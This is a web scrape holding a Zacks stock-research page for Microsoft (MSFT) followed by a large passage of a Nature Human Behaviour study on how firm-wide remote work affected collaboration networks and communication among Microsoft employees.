We use cookies to understand how you use our site and to improve your experience. This includes personalizing content and advertising. To learn more, click here . By continuing to use our site, you accept our use of cookies, revised Privacy Policy and Terms of Service .

Zacks Investment Research Home

Member Sign In

Don't Know Your Password?

Zacks

  • Zacks #1 Rank
  • Zacks Industry Rank
  • Zacks Sector Rank
  • Equity Research
  • Mutual Funds
  • Mutual Fund Screener
  • ETF Screener
  • Earnings Calendar
  • Earnings Releases
  • Earnings ESP
  • Earnings ESP Filter
  • Stock Screener
  • Premium Screens
  • Basic Screens
  • Research Wizard
  • Personal Finance
  • Money Managing
  • Real Estate
  • Retirement Planning
  • Tax Information
  • My Portfolio
  • Create Portfolio
  • Style Scores
  • Testimonials
  • Zacks.com Tutorial

Services Overview

  • Zacks Ultimate
  • Zacks Investor Collection
  • Zacks Premium

Investor Services

  • ETF Investor
  • Home Run Investor
  • Income Investor
  • Stocks Under $10
  • Value Investor
  • Top 10 Stocks

Other Services

  • Method for Trading
  • Zacks Confidential

Trading Services

  • Black Box Trader
  • Counterstrike
  • Headline Trader
  • Insider Trader
  • Large-Cap Trader
  • Options Trader
  • Short Sell List
  • Surprise Trader
  • Alternative Energy

Zacks Investment Research Home

You are being directed to ZacksTrade, a division of LBMZ Securities and licensed broker-dealer. ZacksTrade and Zacks.com are separate companies. The web link between the two companies is not a solicitation or offer to invest in a particular security or type of security. ZacksTrade does not endorse or adopt any particular investment strategy, any analyst opinion/rating/report or any approach to evaluating individual securities.

If you wish to go to ZacksTrade, click OK . If you do not, click Cancel.

Microsoft (MSFT)

(delayed data from nsdq).

$402.18 USD

-0.61 (-0.15%)

Updated Feb 21, 2024 04:00 PM ET

After-Market: $403.17 +0.99 (0.25%) 6:18 PM ET

Add to portfolio

This is our short term rating system that serves as a timeliness indicator for stocks over the next 1 to 3 months. How good is it? See rankings and related performance below.

Zacks Rank Education - Learn about the Zacks Rank

Zacks Rank Home - Zacks Rank resources in one place

Zacks Premium - The only way to fully access the Zacks Rank

2-Buy of 5   2      

The Style Scores are a complementary set of indicators to use alongside the Zacks Rank. It allows the user to better focus on the stocks that are the best fit for his or her personal trading style.

The scores are based on the trading styles of Value, Growth, and Momentum. There's also a VGM Score ('V' for Value, 'G' for Growth and 'M' for Momentum), which combines the weighted average of the individual style scores into one score.

Within each Score, stocks are graded into five groups: A, B, C, D and F. As you might remember from your school days, an A, is better than a B; a B is better than a C; a C is better than a D; and a D is better than an F.

As an investor, you want to buy stocks with the highest probability of success. That means you want to buy stocks with a Zacks Rank #1 or #2, Strong Buy or Buy, which also has a Score of an A or a B in your personal trading style.

Zacks Style Scores Education - Learn more about the Zacks Style Scores

D  Value | D  Growth | B  Momentum | D  VGM

The Zacks Industry Rank assigns a rating to each of the 265 X (Expanded) Industries based on their average Zacks Rank.

An industry with a larger percentage of Zacks Rank #1's and #2's will have a better average Zacks Rank than one with a larger percentage of Zacks Rank #4's and #5's.

The industry with the best average Zacks Rank would be considered the top industry (1 out of 265), which would place it in the top 1% of Zacks Ranked Industries. The industry with the worst average Zacks Rank (265 out of 265) would place in the bottom 1%.

Zacks Rank Education -- Learn more about the Zacks Rank Zacks Industry Rank Education -- Learn more about the Zacks Industry Rank

Top 25% (63 out of 250)

Industry: Computer - Software

Zacks Premium Feature

Company Summary

Microsoft Corporation is one of the largest broad-based technology providers in the world. The company dominates the PC software market with more than 73% of the market share for desktop operating systems. The company’s Microsoft 365 application suite is one of the most popular productivity software globally. It is also one of the prominent public cloud providers that can deliver a wide variety of infrastructure-as-a-service (IaaS) and platform-as-a-service (PaaS) solutions at scale. Redmond, WA-based Microsoft’s products include operating systems, cross-device productivity applications, server applications, business solution applications, desktop and server ...

Microsoft Corporation is one of the largest broad-based technology providers in the world. The company dominates the PC software market with more than 73% of the market share for desktop operating systems. The company’s Microsoft 365 application suite is one of the most popular productivity software globally. It is also one of the prominent public cloud providers that can deliver a wide variety of infrastructure-as-a-service (IaaS) and platform-as-a-service (PaaS) solutions at scale. Redmond, WA-based Microsoft’s products include operating systems, cross-device productivity applications, server applications, business solution applications, desktop and server management tools, software development tools and video games. Its software solutions and hardware devices are playing an important role in developing the metaverse. The company designs and sells PCs, tablets, gaming and entertainment consoles, other intelligent devices, and related accessories. Through Azure, it offers cloud-based solutions that provide customers with software, services, platforms and content. Microsoft reported revenues of $211.9 billion in fiscal 2023. The company reports operations under three segments: Productivity & Business Processes, Intelligent Cloud and More Personal Computing. Productivity & Business Processes accounted for 32.6% of fiscal 2023 revenues. The segment offers productivity and collaboration tools and services including Office 365, Dynamics business solutions, Teams, Relationship Sales solution, Power Platform and LinkedIn. Intelligent Cloud, which include Azure cloud services, contributed to 41.4% of fiscal 2023 revenues. In Jan, 2022, the company entered into a definitive agreement to acquire Activision Blizzard. The acquisition will accelerate the growth in Microsoft’s gaming business across mobile, PC, console, and cloud gaming. Microsoft and Activision Blizzard have jointly agreed to extend the merger agreement through Oct 18, 2023 to allow for additional time to resolve remaining regulatory concerns. More Personal Computing represented 25.8% of fiscal 2023 revenues. The segment comprises mainly the Windows, Gaming (Xbox hardware and Xbox software and services), Devices (Surface, PC accessories, and other intelligent devices) and Search (Bing and Microsoft Advertising) businesses.

General Information

Microsoft Corporation

ONE MICROSOFT WAY

REDMOND, WA 98052

Phone: 425-882-8080

Fax: 425-706-7329

Web: http://www.microsoft.com

Email: [email protected]

EPS Information

Price and volume information.

MSFT

Fundamental Ratios

This file is used for Yahoo remarketing pixel add

microsoft research report

Due to inactivity, you will be signed out in approximately:

Thank you for visiting nature.com. You are using a browser version with limited support for CSS. To obtain the best experience, we recommend you use a more up to date browser (or turn off compatibility mode in Internet Explorer). In the meantime, to ensure continued support, we are displaying the site without styles and JavaScript.

  • View all journals
  • Explore content
  • About the journal
  • Publish with us
  • Sign up for alerts
  • Published: 09 September 2021

The effects of remote work on collaboration among information workers

  • Longqi Yang   ORCID: orcid.org/0000-0002-6615-8615 1 ,
  • David Holtz   ORCID: orcid.org/0000-0002-0896-8628 2 , 3 ,
  • Sonia Jaffe   ORCID: orcid.org/0000-0001-8924-0294 1 ,
  • Siddharth Suri   ORCID: orcid.org/0000-0002-1318-8140 1 ,
  • Shilpi Sinha 1 ,
  • Jeffrey Weston 1 ,
  • Connor Joyce 1 ,
  • Neha Shah 1 ,
  • Kevin Sherman   ORCID: orcid.org/0000-0001-5793-3336 1 ,
  • Brent Hecht   ORCID: orcid.org/0000-0002-7955-0202 1 &
  • Jaime Teevan   ORCID: orcid.org/0000-0002-2786-0209 1  

Nature Human Behaviour volume  6 ,  pages 43–54 ( 2022 ) Cite this article

462k Accesses

202 Citations

2988 Altmetric

Metrics details

  • Business and management

An Author Correction to this article was published on 05 October 2021

This article has been updated

The coronavirus disease 2019 (COVID-19) pandemic caused a rapid shift to full-time remote work for many information workers. Viewing this shift as a natural experiment in which some workers were already working remotely before the pandemic enables us to separate the effects of firm-wide remote work from other pandemic-related confounding factors. Here, we use rich data on the emails, calendars, instant messages, video/audio calls and workweek hours of 61,182 US Microsoft employees over the first six months of 2020 to estimate the causal effects of firm-wide remote work on collaboration and communication. Our results show that firm-wide remote work caused the collaboration network of workers to become more static and siloed, with fewer bridges between disparate parts. Furthermore, there was a decrease in synchronous communication and an increase in asynchronous communication. Together, these effects may make it harder for employees to acquire and share new information across the network.

Similar content being viewed by others

microsoft research report

Human languages with greater information density have higher communication speed but lower conversation breadth

Pedro Aceves & James A. Evans

microsoft research report

Online images amplify gender bias

Douglas Guilbeault, Solène Delecourt, … Ethan Nadler

microsoft research report

Closing the accessibility gap to mental health treatment with a personalized self-referral chatbot

Johanna Habicht, Sruthi Viswanathan, … Max Rollwage

Before the COVID-19 pandemic, at most 5% of Americans worked from home for more than three days per week 1 , whereas it is estimated that, by April 2020, as many as 37% of Americans were working from home (WFH) full-time 2 , 3 . Thus, in a matter of weeks, the pandemic caused about one-third of US workers to shift to WFH and nearly every American that was able to work from home did so 4 . Many technology companies, such as Twitter, Facebook, Square, Box, Slack and Quora, have taken this shift one step further by announcing longer term and, in some cases permanent, remote work policies that will enable at least some employees to work remotely, even after the pandemic 5 , 6 . More generally, COVID-19 has accelerated the shift away from traditional office work, such that even firms that do not keep full-time remote work policies in place after the pandemic has ended are unlikely to fully return to their pre-COVID-19 work arrangements 7 . Instead, they are likely to switch to some type of hybrid work model, in which employees split their time between remote and office work, or a mixed-mode model, in which firms are comprised of a mixture of full-time remote employees and full-time office employees. For example, some scholars predict a long-run equilibrium in which information workers will work from home approximately 20% of the time 1 . For long-term policy decisions regarding remote, hybrid and mixed-mode work to be well informed, decision makers need to understand how remote work would impact information work in the absence of the effects of COVID-19. To answer this question, we treat Microsoft’s company-wide WFH policy during the pandemic as a natural experiment that, subject to the validity of our identifying assumptions, enables us to causally identify the impact of firm-wide remote work on employees’ collaboration networks and communication practices.

Previous research has shown that network topology, including the strength of ties, has an important role in the success of both individuals and organizations. For individuals, it is beneficial to have access to new, non-redundant information through connections to different parts of an organization’s formal organizational chart and through connections to different parts of an organization’s informal communication network 8 . Furthermore, being a conduit through which such information flows by bridging ‘structural holes’ 9 in the organization can have additional benefits for individuals 10 . For firms, certain network configurations are associated with the production of high-quality creative output 11 , and there is a competitive advantage to successfully engaging in the practice of ‘knowledge transfer,’ in which experiences from one set of people within an organization are transferred to and used by another set of people within that same organization 12 . Conditional on a given network position or configuration, the efficacy with which a given tie can transfer or provide access to novel information depends on its strength. Two people connected by a strong tie can often transfer information more easily (as they are more likely to share a common perspective), to trust one another, to cooperate with one another, and to expend effort to ensure that recently transferred knowledge is well understood and can be utilized 10 , 13 , 14 , 15 . By contrast, weak ties require less time and energy to maintain 8 , 16 and are more likely to provide access to new, non-redundant information 8 , 17 , 18 .

Our results show that the shift to firm-wide remote work caused business groups within Microsoft to become less interconnected. It also reduced the number of ties bridging structural holes in the company’s informal collaboration network, and caused individuals to spend less time collaborating with the bridging ties that remained. Furthermore, the shift to firm-wide remote work caused employees to spend a greater share of their collaboration time with their stronger ties, which are better suited to information transfer, and a smaller share of their time with weak ties, which are more likely to provide access to new information.

Previous research has also shown that the performance of workers is affected not only by the structure of the network and the strength of their ties, but also by the temporal dynamics of the network. Not only do the benefits of different types of ties vary with their age 19 , but people also benefit from changing their network position 20 , 21 , 22 , adding new ties 23 , 24 and reconnecting with dormant ties 25 . We find that the shift to firm-wide remote work may have reduced these benefits by making the collaboration network of workers more static—individuals added and deleted fewer ties from month-to-month and spent less time with newly added ties.

Existing theoretical perspectives and empirical results suggest that knowledge transfer and collaboration are also affected by the modes of communication that workers use to collaborate with one another. On the theoretical front, media richness theory 26 , 27 posits that richer communication channels, such as in-person interaction, are best suited to communicating complex information and ideas. Moreover, media synchronicity theory 28 proposes that asynchronous communication channels (such as email) are better suited for conveying information and synchronous channels (such as video calls) are better suited for converging on the meaning of information. There is also a rich body of empirical research that documents the myriad implications of communication media choice for organizations. For example, previous research has shown that establishing a rapport, which is an important precursor to knowledge transfer, is impeded by email use 29 , and that in-person and phone/video communication are more strongly associated with positive team performance than email and instant message (IM) communication 30 .

Remote work obviously eliminates in-person communication; however, we found that people did not simply replace in-person interactions with video and/or voice calls. In fact, we found that shifting to firm-wide remote work caused an overall decrease in observed synchronous communication such as scheduled meetings and audio/video calls. By contrast, we found that remote work caused employees to communicate more through media that are more asynchronous—sending more emails and many more IMs. Media richness theory, media synchronicity theory and previous empirical studies all suggest that these communication media choices may make it more difficult for workers to convey and/or converge on the meaning of complex information.

There is a large body of academic research across multiple disciplines that has studied remote work, virtual teams and telecommuting (see ref. 31 for a review of much of this work), including previous research studies that examined the network structure of virtual teams and how individual network position in virtual teams correlates with performance 32 , 33 , 34 . During the COVID-19 pandemic, there has been renewed public and academic interest in how virtual teams function. Recent analyses of telemetry and survey data show that the pandemic has affected both the who and the how of collaboration in information firms—while working remotely during the pandemic, workers are spending less time in meetings 35 , communicating more by email 35 , collaborating more with their strong ties as opposed to their weak ties 36 , and exhibiting patterns of communication that are more siloed and less stable 37 . However, these analyses, like much of the previous research on remote work, virtual teams and telecommuting, are non-causal 31 and are therefore unable to separate the effects of remote work from the effects of pandemic-related confounding factors, such as reduced focus due to COVID-19-related stress or increased caregiving responsibilities while sheltering in place. Although previous research on the causal effects of remote work does exist, this work has mainly studied employees who volunteer to work remotely, and has focused on settings such as call centres and patent offices 38 , 39 where, relative to the majority of information work, tasks are more easily codifiable and are less likely to depend on collaboration or the transfer of complex knowledge.

In this article, we contribute to the research literatures on remote work, virtual teams and telecommuting by analysing the large-scale natural experiment created by Microsoft’s firm-wide WFH policy during the COVID-19 pandemic. As remote work was mandatory during the pandemic, we are able to quantify the effects of firm-wide remote work, which are most relevant for firms considering a transition to an all-remote workforce. Furthermore, as our model specification decomposes the overall effects of firm-wide remote work into ego remote work and collaborator remote work effects, our results also provide some insight into the possible impacts of remote work policies such as mixed-mode work and hybrid work.

We analysed anonymized individual-level data describing the communication practices of 61,182 US Microsoft employees from December 2019 to June 2020—data from before and after Microsoft’s shift to firm-wide remote work (our data on workers’ choice of communication media goes back only to February 2020). Our sample contains all US Microsoft employees except for those who hold senior leadership positions and/or are members of teams that routinely handle particularly sensitive data. Given the scope of our dataset, the workers in our sample perform a wide variety of tasks, including software and hardware development, marketing and business operations. For each employee, we observe (1) their remote work status before the COVID-19 pandemic, and what share of their colleagues were remote workers before the COVID-19 pandemic; (2) their managerial status, the business group they belong to, their role and the length of their tenure at Microsoft as of February 2020; (3) a weekly summary of the amount of time spent in scheduled meetings, time spent in unscheduled video/audio calls, emails sent and IMs sent, and the length of their workweek; and (4) a monthly summary of their collaboration network. Before the COVID-19 pandemic, managers at Microsoft used their own discretion in deciding whether an employee could work from home, which was the exception rather than the norm.

The natural experiment that we analysed came from the company-wide WFH mandate Microsoft enacted in response to COVID-19. On 4 March 2020, Microsoft mandated that all non-essential employees in their Puget Sound and Bay Area campuses shift to full-time WFH. Other locations followed suit and, by 1 April 2020, all non-essential US Microsoft employees were WFH full-time. Before the onset of the pandemic, 18% of US Microsoft employees were working remote from their collaborators. For this subset of employees, the shift to firm-wide remote work did not cause a change in their own remote work status, but did induce variation in the share of their colleagues who were working remotely. For the remaining 82% of US Microsoft employees, the shift to firm-wide remote work induced variation in both their own remote work status and in the remote work status of their coworkers.

We analysed this natural experiment using a modified difference-in-differences (DiD) model. Standard DiD is an econometric approach that enables researchers to infer the causal effect of a treatment by comparing longitudinal data from at least two groups, some of which are ‘treated’ and some of which are not. Provided that the identifying assumptions of the DiD model are satisfied, the causal effect of the treatment is obtained by comparing the magnitude of the gap between the treated and untreated groups after the treatment is delivered with the magnitude of the gap between the groups before the treatment is delivered. Our modified DiD model extends the standard DiD model by estimating the causal effects of changes in two different treatment variables (one’s own remote work status and the remote work status of one’s colleagues) and by introducing additional identifying assumptions such that it is possible to draw causal inferences in the presence of an additional shock (in our case, the non-WFH-related aspects of COVID-19) that affects both treated and untreated units, and is concurrent with the exogenous shock(s) to our treatment variables. The time series trends shown in Fig. 1 suggest that the identifying assumptions of our modified DiD model are plausible; further details on the model are provided in the Methods .

figure 1

a – d , The average number of bridging ties per month ( a , c ) and the average unscheduled video/audio call hours per week ( b , d ) for different groups of employees, relative to the overall average in February. These plots establish the plausibility of the ‘parallel trends’ assumption that is required by our modified DiD model. The error bars show the 95% CIs and are in some places thinner than the symbols in the figure; s.e. values are clustered at the team level. a , b , The graphs show employees who, before COVID-19, worked from the office (blue; n  = 50,268) and a matched sample of employees who worked remotely (orange; n  = 10,914). c , d , The graphs show two subgroups of the blue lines in a and b —employees who, before COVID-19, had less than 10% of their collaborators working remotely (dashed; n  = 36,008) and those who had more than 50% of their coworkers working remotely (dotted; n  = 1,861). Both variables were normalized by subtracting and dividing by the average across the entire sample of that variable in February. Most employees transitioned to WFH during the week of 1 March 2020, although our analysis omits the month of March as a transition period.

In all of the analyses that follow, we cannot report the actual level of our outcome variables due to confidentiality concerns. Instead, throughout the paper we report outcomes and effects in terms of February value (FV)—the average level of that variable (for example, number of bridging ties) for all US employees in February.

Effects of remote work on collaboration networks

We start by presenting the non-causal time-series trends for different collaboration network outcomes across our entire sample. These trends provide insights into how work practices have changed during the COVID-19 pandemic, and also represent the type of data that many executives may use when making decisions regarding their firm’s long-term remote work policy.

Descriptive statistics

Figure 2 shows the average monthly time series for various aspects of workers’ collaboration egocentric (ego) networks from December 2019 to June 2020: the number of connections, the number of groups interacted with, the number of and share of time with cross-group connections, the number and share of time with bridging connections, the clustering coefficient, the share of time with weak connections, the number of churned and added connections, and the share of time with added connections. Mathematical definitions for these measures are provided in the Methods . Although we did not find evidence of a clear pattern of change around the shift to firm-wide remote work for many of these measures, we did observe large changes in the average shares of monthly collaboration hours spent with cross-group ties, bridging ties, weak ties and added ties, which all decreased precipitously between February and June.

figure 2

a – k , The monthly averages for the collaboration network variables for all employees relative to the February average. Each variable was normalized by subtracting and dividing by the average FV for that variable. The vertical bars show the 95% CIs, but are in most places not much taller than the data points; s.e. values are clustered at the team level. The variables are employees’ average number of network ties ( a ), distinct business groups in which they have a collaborator ( b ), cross-group ties ( c ), ties that bridge structural holes in the network ( e ), individual clustering coefficient ( g ), collaborators from the previous month that they did not collaborate with that month ( i ) and added collaborators they did not collaborate with the previous month ( j ), as well as the share of time spent with cross-group ties ( d ), bridging ties ( f ), weak ties ( h ) and added ties ( k ). n  = 61,279 for each panel.

Causal analysis

We next used our modified DiD model to isolate the effects of firm-wide remote work on the collaboration network, which are shown in Fig. 3 . Although we found no effect on the number of collaborators that employees had (the size of their collaboration ego network), we did find that firm-wide remote work decreased the number of distinct business groups that an employee was connected to by 0.07 FV ( P  < 0.001, 95% confidence interval (CI) = 0.05–0.10). Firm-wide remote work also decreased the cross-group connections of workers by 0.04 FV ( P  = 0.008, 95% CI = 0.01–0.07) and the share of collaboration time workers spent with cross-group connections by 0.26 FV ( P  < 0.001, 95% CI = 0.23–0.29). In other words, firm-wide remote work caused an overall decrease in the number of cross-group interactions and the fraction of attention paid to groups other than one’s own.

figure 3

The estimated causal effects of both an employee and that employee’s colleagues switching to remote work on the number of collaborators an employee has, the number of distinct groups the employee collaborates with, the number of cross-group ties an employee has, the share of time an employee spends collaborating with cross-group ties, the number of bridging ties an employee has, the share of time an employee spends collaborating with bridging ties, the individual clustering coefficient of an employee’s ego network, the share of time an employee spent collaborating with weak ties, the number of churned collaborators, the number of added collaborators and the share of time spent with added collaborators. The reported effects are ( β  +  δ ) from equation ( 1 ), normalized by dividing by the average level of that variable in February. The symbols depict point estimates and the lines show the 95% CIs. n  = 61,182 for all variables. The full results are provided in Supplementary Tables 1 and 2 .

Although formal organizational boundaries shape informal interactions 40 , the formal organization of firms and their informal social structure are two distinct, interrelated concepts 41 . Connections that provide access to diverse teams may not bridge structural holes in the network sense 9 , and connections that bridge structural holes in the network sense may not provide access to different parts of the formal organizational chart. We therefore also analysed how the shift to firm-wide remote work affected the structural diversity of employees’ ego networks with respect to the firm’s observed communication network, as opposed to the formal organizational chart. We label each tie as ‘bridging’ or ‘non-bridging’ on the basis of its local network constraint, which is a measure of the extent to which a given tie bridges structural holes in a network 9 , 42 . We then measured the effect of firm-wide remote work on the number of bridging ties that each worker had and the amount of time that each worker spent with their bridging ties. We found that, on average, firm-wide remote work decreased the number of bridging ties by 0.09 FV ( P  < 0.001, 95% CI = 0.06–0.13) and the share of time with bridging ties by 0.41 FV ( P  < 0.001, 95% CI = 0.35–0.47). The fact that firm-wide remote work caused workers to have fewer bridging ties, and to spend less time with their remaining bridging ties, suggests that firm-wide remote work may have reduced the ability of workers to access new information in other parts of the network. These results, in conjunction with our finding that firm-wide remote work reduced workers’ cross-group interactions, also suggest that firm-wide remote work caused the collaboration network to become more siloed, both in a formal sense and in an informal sense.

We also found that firm-wide remote work caused a 0.06 FV ( P  = 0.005, 95% CI = 0.02–0.10) increase in the individual clustering coefficient, which provides a measure of what proportion of an individual’s network connections are also connected to each other (the higher a person’s individual clustering coefficient, the more dense their ego network). Given the fact that we did not observe a statistically significant effect of remote work on the number of colleagues with whom workers collaborate, this result suggests that, on average, firm-wide remote work caused workers to substitute ties that were not connected to one another for those that were. In other words, different portions of the network, which became less interconnected, also became more intraconnected.

The ability of a worker to effectively access knowledge from other parts of an organization is a function of not only the organizational and/or topological diversity of their connections, but also the strength of those connections. For each month, we classified ties as strong when they were in the top 50% of an employee’s ties in terms of hours spent communicating, and as weak otherwise. Although we have not seen strong and weak ties defined in this exact way elsewhere in the research literature on social networks, the research community has not, to our knowledge, converged on a standard way to measure tie strength. Our operationalization is similar to a common tie strength definition that simply counts the amount of contact between ties 43 , 44 , 45 and allows tie strength to vary over time on the basis of the relative amount of contact between two people 46 . Also, it is consistent with Granovetter’s original notion that tie strength is determined by a combination of “the amount of time, the emotional intensity, the intimacy (mutual confiding) and the reciprocal services which characterize the tie” 8 .

Although weak ties by definition will always get less of an employee’s time than strong ties in a given month, we found that the shift to remote work reduced the share of time that workers spent collaborating with weak ties by 0.32 FV ( P  < 0.001, 95% CI = 0.29–0.35). As the median is just one possible cut-off to distinguish between strong and weak ties, we also analysed the entire distribution of collaboration time for each worker and confirmed that the average ego-level-normalized Herfindahl–Hirschman index (HHI) 47 of the collaboration time is increased by remote work, and that the average ego-level Shannon entropy 48 of collaboration time is decreased by remote work. The effects of firm-wide remote work on both of these outcomes are provided in Supplementary Table 2 . In total, these results indicate that, above and beyond the impact of firm-wide remote work on the organizational and structural diversity of workers’ ego networks, the shift to firm-wide remote work also made the allocation of workers’ time more heavily concentrated.

We also found that the shift to firm-wide remote work caused workers’ ego networks to become more static; firm-wide remote work reduced the number of existing connections that churned from month-to-month by 0.05 FV ( P  = 0.006, 95% CI = 0.02–0.09), and decreased the number of connections workers added month-to-month by 0.04 FV ( P  = 0.015, 95% CI = 0.01–0.07). Furthermore, the shift to firm-wide remote work decreased the share of time that workers spent collaborating with the connections they did add by 0.29 FV ( P  < 0.001, 95% CI = 0.24–0.34). Of the added ties we observed in June 2020, 40% existed in at least one month between January 2020 and May 2020, whereas the remaining 60% did not. This suggests that the added ties that we observed are a mixture of dormant ties 25 and ties that are truly new. Overall, the changes that we observed in the temporal dynamics of ego networks may have made it more difficult for workers to capture the benefits associated with forming new connections 23 , 24 , reconnecting with dormant connections 25 and modulating their network position 20 , 21 , 22 . These results are robust to the use of alternative definitions of added and deleted ties (full details are provided in the Supplementary Information ).

In summary, our results suggest that firm-wide remote work ossified workers’ ego networks, made the network more fragmented and made each fragment more clustered. We tested for heterogeneity in the effects of the shift to firm-wide remote work on collaboration ego networks with respect to a worker’s managerial status (manager versus individual contributor), tenure at Microsoft (shorter tenure versus longer tenure) and role type (engineering versus non-engineering), and did not find meaningful heterogeneity across any of these dimensions (Supplementary Figs. 1 , 2 and 4 ).

The effects of remote work on the use of communication media

In addition to estimating the effects of firm-wide remote work on workers’ collaboration networks, we also estimated the impact of firm-wide remote work on workers’ choice of communication media.

Figure 4 shows the non-causal time-series trends for workweek hours and different communication media outcomes across our entire sample. Detailed definitions for each of these outcomes are provided in the Methods . For unscheduled call hours, meeting hours, total video/audio hours and IMs sent, we observed considerable increases around the time of the switch to firm-wide remote work; these increases are sustained through our data timespan. The change in email volume is much smaller and shorter-lived. Figure 4f shows the change in workweek hours, a metric that measures the total amount of time between the first observed work activity and the last observed work activity on each work day in a given week. Although there was a sustained increase in workweek hours, it was too small to account for the large increases that we observed in the use of various communication media without a simultaneous shift in the way that employees were conducting work.

figure 4

a – f , The weekly averages for each variable, relative to the February average. Each variable was normalized by subtracting and dividing by the average FV for that variable. The vertical bars show the 95% CIs, but are in most places not much taller than the data points; s.e. values are clustered at the team level. The variables are the employees’ average number of unscheduled audio/video call hours ( a ), scheduled meeting hours ( b ), total hours in scheduled meetings and unscheduled calls (the sum of a and b ) ( c ), IMs sent ( d ), emails sent ( e ), and hours between the first and last activity (sent email, scheduled meeting, or Microsoft Teams call or chat) in a day, summed across the workdays ( f ). The dips in all six metrics during the weeks of 16 February, 24 May and 14 June were due to four-day workweeks, in observance of Presidents’ Day, Juneteenth and Memorial Day, respectively. n  = 61,279 for all variables.

Figure 5 shows the estimated causal effects of firm-wide remote work on the amount of communication conducted through different media, as well as the length of workers’ workweeks. Relative to the baseline case of all coworkers working in an office together, we found that firm-wide remote work decreased scheduled meeting hours by 0.16 FV ( P  < 0.001, 95% CI = 0.13–0.19) and increased unscheduled video/audio call hours by 1.6 FV ( P  < 0.001, 95% CI = 1.5–1.8). The increase in unscheduled calls was more than offset by the decrease in scheduled meeting hours. To observe that, we defined the sum of unscheduled call hours and scheduled meetings hours as the synchronous video/audio communication hours. We estimate that firm-wide remote work caused a slight decrease of 0.05 FV ( P  = 0.006, 95% CI = 0.01–0.08) in the total amount of synchronous video/audio communication. Given that, by definition, a shift to firm-wide remote work causes in-person interactions to drop to zero and synchronous video/audio communication decreased overall, our results also indicate that firm-wide remote work led to a decrease in the total amount of synchronous collaboration, both in-person and through Microsoft Teams.

figure 5

The estimated causal effects of both an employee and their colleagues switching to remote work on the employee’s hours spent in scheduled meetings, hours spent in unscheduled calls, the sum of meetings and call hours, IMs sent, emails sent and estimated workweek hours. The reported effects are ( β  +  δ ) from equation ( 1 ), normalized by dividing by the average level of that variable in February. The symbols depict point estimates and lines depict 95% CIs. n  = 61,182 for all variables. The full results are provided in Supplementary Table 3 .

Although firm-wide remote work caused a decrease in synchronous communication, it also caused an increase in the amount of asynchronous communication. Firm-wide remote work increased the number of emails sent by workers by 0.08 FV ( P  < 0.001, 95% CI = 0.05–0.12) and the number of IMs sent by workers by 0.50 FV ( P  < 0.001, 95% CI = 0.46–0.55). Firm-wide remote work also increased the average number of workweek hours by 0.10 FV ( P  < 0.001, 95% CI = 0.09–0.11); however, this effect is small relative to the effect on IM volume. This suggests that the increase in IMs reflects a change in workers’ collaboration patterns while working, as opposed to changes in how much workers were working. The fact that shifting to firm-wide remote work increased the number of workweek hours also makes the negative effect of firm-wide remote work on synchronous collaboration more notable. The increase in workweek hours could be an indication that employees were less productive and required more time to complete their work, or that they replaced some of their commuting time with work time; however, as we are able to measure only the time between the first and last work activity in a day, it could also be that the same amount of working time is spread across a greater share of the calendar day due to breaks or interruptions for non-work activities.

Heterogeneous effects of firm-wide remote work on communication media choice

Although the effects of firm-wide remote work on collaboration networks did not exhibit heterogeneity across the worker attributes that we observed, the effects of firm-wide remote work on communication media were in some cases larger for managers and engineers. We found that the switch to firm-wide remote work caused larger increases for managers than individual contributors in IMs sent, emails sent and unscheduled video/audio call hours (Fig. 6 , left). This is probably because, relative to individual contributors, a larger share of managers’ time is dedicated to communicating with others, that is, their direct reports (for example, to address issues blocking progress or conduct performance reviews), and representatives of other groups within the organization (for example, to coordinate activity and goals across different groups). We also find that the shift to firm-wide remote work caused larger increases for engineers than non-engineers in the number of IMs sent and the number of unscheduled call hours (Fig. 6 , right). This may be reflective of the fact that software development teams are particularly reliant on informal communication 49 , 50 , 51 , much of which may have taken place in-person before the shift to firm-wide remote work. We did not find meaningful heterogeneity with respect to employee tenure at Microsoft.

figure 6

The causal effects, estimated separately for managers ( n  = 9,715) and individual contributors (ICs) ( n  = 51,467) (left) and engineers (n = 29, 510) and non-engineers ( n  = 31,672) (right), of an employee and their colleagues switching to remote work on hours spent in scheduled meetings, the sum of scheduled meetings and unscheduled call hours, IMs sent, emails sent and estimated workweek hours ( a ), and hours spent in unscheduled calls ( b ). The reported effects are ( β  +  δ ) from equation ( 1 ), normalized by dividing by the average level of that variable for all employees in February. The symbols depict point estimates and the lines show the 95% CIs. The full results are provided in Supplementary Tables 8 , 9 , 22 and 23 .

Decomposing the effects of firm-wide remote work

One benefit of our empirical approach is that it enables us to decompose the causal effects of firm-wide remote work into two components: the direct effect of an employee working remotely on their own work practices (ego effects) and the indirect effect of all an employee’s colleagues working remotely on that employee’s work practices (collaborator effects). The model is linear, so the predicted effects from having half of one’s collaborators switch to remote work would be half as large.

Figure 7 shows the ego and collaborator effects of firm-wide remote work on people’s collaboration networks. Notably, the remote work status of an employee and that employee’s collaborators both contributed to the total effect of firm-wide for most network outcomes. An employee’s collaborators switching to remote work seems to have had a particularly large impact on the amount of time that workers spent with ties that are most likely to provide access to new information, that is, cross-group ties, bridging ties, weak ties and added ties. As seen in Fig. 8 , collaborator effects also dominate ego effects when we decomposed the effects of firm-wide remote work on communication media usage. More than half of the increase in IMs sent and emails sent was due to collaborators switching to remote work, and approximately 90% (+0.09 FV, P  < 0.001, 95% CI = 0.07–0.10) of the increase in workweek hours was due to collaborators switching to remote work. Overall, we found that collaborators switching to remote work caused workers to spend less time attending to sources of new information, communicate more through asynchronous media and work longer hours. Looking to the future, these findings suggest that remote work policies such as mixed-mode and hybrid work may have substantial effects not only on those working remotely but also on those remaining in the office.

figure 7

The estimated causal effects of either an employee ( δ from equation ( 1 )) or their colleagues ( β from equation ( 1 )) switching to remote work on the number of collaborators that an employee has, the number of distinct groups the employee collaborates with, the number of cross-group ties an employee has, the share of time an employee spends collaborating with cross-group ties, the number of bridging ties an employee has, the share of time an employee spends collaborating with bridging ties, the individual clustering coefficient of an employee’s ego network, the share of time an employee spent collaborating with weak ties, the number of churned collaborators, the number of added collaborators and the share of time spent with added collaborators. All effects were normalized by dividing by the average level of that variable in February. The symbols depict point estimates and the lines show the 95% CIs. n  = 61,182 for all variables. The full results are provided in Supplementary Tables 1 and 2 .

figure 8

